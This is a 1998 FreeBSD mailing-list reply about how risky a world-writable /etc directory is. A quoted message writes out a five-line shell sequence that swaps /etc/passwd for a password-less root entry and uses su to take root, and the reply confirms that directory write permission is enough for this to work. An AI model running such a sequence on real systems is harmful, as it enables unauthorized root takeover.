Date: Fri, 18 Dec 1998 08:50:26 -0600 From: Jon Hamilton <hamilton@pobox.com> To: "Bond, Jeffery" <Jeff.Bond@nectech.co.uk> Cc: "'FreeBSD questions'" <questions@FreeBSD.ORG>, "'cjc@cc942873-a.ewndsr1.nj.home.com'" <cjc@cc942873-a.ewndsr1.nj.home.com> Subject: Re: Basic Security Question Message-ID: <199812181453.GAA16474@hub.freebsd.org> In-Reply-To: Your message of "Fri, 18 Dec 1998 09:54:54 GMT." <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>
next in thread | previous in thread | raw e-mail | index | archive | help
In message <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>, "Bo
nd, Jeffery" wrote:
} >Mark Ovens wrote,
} >
} >> and on all the Sparcs running SunOS4.1.3_U1 here are:
} >>
} >> gppsun4:/{8}% ls -ldug etc
} >> drwxrwsrwx 10 bin staff 2048 Dec 17 09:30 etc
} >>
} >> which is even less secure as it's writable by all!
} >
} >I may be dense. Is that some kind of joke or something? As dense as I
} >am, I know for sure that even I could take any account on a system
} >with permissions like that and have control of root in this many
} >keystrokes:
} >
} >% cd /etc
} >% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
} >% mv passwd passwd.old
} >% mv passwd.new passwd
} >% su
} >#
}
} Just because the directory is writable, this doesnt mean the existing files
} in it are too. You won't be able to do 'mv passwd passwd.old'.
That's a common misconception. To move (or remove) a file, all you need
is write and execute permission for the directory containing the file.
Try it yourself and see.
--
Jon Hamilton
hamilton@pobox.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199812181453.GAA16474>